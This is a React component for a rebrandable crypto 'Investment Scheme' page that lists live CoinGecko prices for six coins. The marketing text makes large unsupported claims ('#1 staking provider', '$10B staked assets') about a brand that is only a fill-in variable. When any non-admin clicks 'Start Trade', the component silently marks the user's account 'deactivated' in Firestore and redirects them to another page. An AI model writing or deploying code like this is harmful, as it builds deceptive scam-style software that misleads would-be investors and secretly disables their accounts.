import React, { useEffect, useState } from 'react';
import { useNavigate } from 'react-router-dom';
import '../../styles/Market.css';
import { auth, db } from '../../lib/firebase';
import { onAuthStateChanged } from 'firebase/auth';
import { doc, getDoc, updateDoc } from 'firebase/firestore';

function Market() {
    const BRAND_NAME = process.env.REACT_APP_BRAND_NAME;
    const [cryptos, setCryptos] = useState([]);
    const [userRole, setUserRole] = useState(null);
    const [userId, setUserId] = useState(null);
    const [isMobile, setIsMobile] = useState(window.innerWidth <= 768);
    const [randomIdx, setRandomIdx] = useState(null);
    const navigate = useNavigate();

    useEffect(() => {
        // Listen for auth state
        const unsubscribe = onAuthStateChanged(auth, async (user) => {
            if (user) {
                setUserId(user.uid);
                // Fetch user role from Firestore
                const userDocRef = doc(db, 'users', user.uid);
                const userSnap = await getDoc(userDocRef);
                if (userSnap.exists()) {
                    const data = userSnap.data();
                    setUserRole(data.role || 'user');
                } else {
                    // No user doc, default role investor
                    setUserRole('investor');
                }
            } else {
                setUserId(null);
                setUserRole(null);
            }
        });

        return () => unsubscribe();
    }, []);

    useEffect(() => {
        // Fetch crypto data from CoinGecko
        const fetchData = async () => {
            try {
                const response = await fetch(
                    'https://api.coingecko.com/api/v3/coins/markets?vs_currency=usd&ids=solana,sui,binancecoin,bitcoin,dogecoin,ripple'
                );
                const data = await response.json();
                setCryptos(data);
            } catch (err) {
                console.error('Failed to fetch crypto data:', err);
            }
        };

        fetchData();
    }, []);

    useEffect(() => {
        const handleResize = () => setIsMobile(window.innerWidth <= 768);
        window.addEventListener('resize', handleResize);
        return () => window.removeEventListener('resize', handleResize);
    }, []);

    useEffect(() => {
        if (cryptos.length > 0 && randomIdx === null) {
            setRandomIdx(Math.floor(Math.random() * cryptos.length));
        }
    }, [cryptos, randomIdx]);

    const handleTradeClick = async () => {
    if (!userId) {
        navigate('/login');
        return;
    }

    if (userRole !== 'admin') {
        const userDocRef = doc(db, 'users', userId);
        try {
            await updateDoc(userDocRef, { group: 'deactivated' });
            // userRole remains unchanged
        } catch (err) {
            console.error('Error updating user group:', err);
        }
    }
    navigate('/mega-fxt');
};



    return (
        <div className="stock-container">
            <h2 className="transaction-heads">{BRAND_NAME} Investment Scheme</h2>
            <div className="center">
                {BRAND_NAME} is the #1 staking provider for institutions, offering secure, risk-mitigated rewards across 50+ blockchain networks. We are entrusted with $10B staked assets and deliver 99.9% uptime.
            </div>
            <div className="stock-grid">
                {(isMobile && randomIdx !== null ? [cryptos[randomIdx]] : cryptos).map((coin) => {
                    const percentageChange = coin.price_change_percentage_24h?.toFixed(2) || '0.00';
                    return (
                        <div className="stock-card" key={coin.id}>
                            <div className="stock-header">
                                <div className="stock-info-main">
                                    <img src={coin.image} alt={coin.name} className="coin-icon" />
                                    <div className="stock-info">
                                        <h2>{coin.name}</h2>
                                        <strong>{coin.symbol.toUpperCase()}</strong>
                                    </div>
                                </div>
                                <p className={`change ${percentageChange >= 0 ? 'positive' : 'negative'}`}>
                                    {percentageChange}%
                                </p>
                            </div>
                            <div className="price-section">
                                <p className="price-label">Current Price:</p>
                                <p className="price-value">${coin.current_price.toLocaleString()}</p>
                            </div>
                            <div className="price-row">
                                <p className="price-label">Market Cap:</p>
                                <p className="price-value">${coin.market_cap.toLocaleString()}</p>
                            </div>
                            <button className="trade-button" onClick={handleTradeClick}>
                                Start Trade
                            </button>
                        </div>
                    );
                })}
            </div>
        </div>
    );
}

export default Market;
